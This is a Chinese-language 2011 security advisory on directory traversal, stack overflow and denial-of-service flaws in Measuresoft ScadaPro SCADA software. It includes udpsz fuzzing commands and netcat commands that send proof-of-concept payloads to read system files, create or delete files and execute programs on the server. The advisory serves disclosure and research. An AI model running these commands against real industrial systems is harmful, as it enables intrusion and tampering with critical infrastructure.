Measuresoft ScadaPro多个安全漏洞


发布日期:2011-09-13
更新日期:2011-09-13

受影响系统:
Measuresoft scada
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 49613

ScadaPro是用于MS Windwos的实时数据捕获软件。

Measuresoft ScadaPro在实现上存在多个安全漏洞,远程攻击者可利用这些漏洞使用目录遍历字符串执行非法操作或执行任意代码或命令,可能造成拒绝服务。该软件中的大部分支持命令中存在栈溢出漏洞和拒绝服务漏洞。

 

<*来源:Luigi Auriemma (aluigi@pivx.com)
 
  链接:http://aluigi.altervista.org/adv/scadapro_1-adv.txt
        http://secunia.com/advisories/45973/
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Luigi Auriemma (aluigi@pivx.com)提供了如下测试方法:

http://aluigi.org/testz/udpsz.zip

only a simple scanner:
  udpsz -d 2 -c "xx%"       -b a -X 0 16 l 0x6161 -T -l 0 SERVER 11234 0x2000
  udpsz -d 2 -c "xx%test\t" -b a -X 0 16 l 0x6161 -T -l 0 SERVER 11234 0x2000
  udpsz -d 2 -c "xx%test,"  -b a -X 0 16 l 0x6161 -T -l 0 SERVER 11234 0x2000

http://aluigi.org/poc/scadapro_1.zip

  nc SERVER 11234 < scadapro_1b.dat     ; read c:\boot.ini
  nc SERVER 11234 < scadapro_1c.dat     ; create c:\evil_file.txt
  nc SERVER 11234 < scadapro_1d.dat     ; delete c:\valid_file.txt
  nc SERVER 11234 < scadapro_1e.dat     ; execute notepad

建议:
--------------------------------------------------------------------------------
厂商补丁:

Measuresoft
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.measuresoft.com/products/scada-products.aspx

相关内容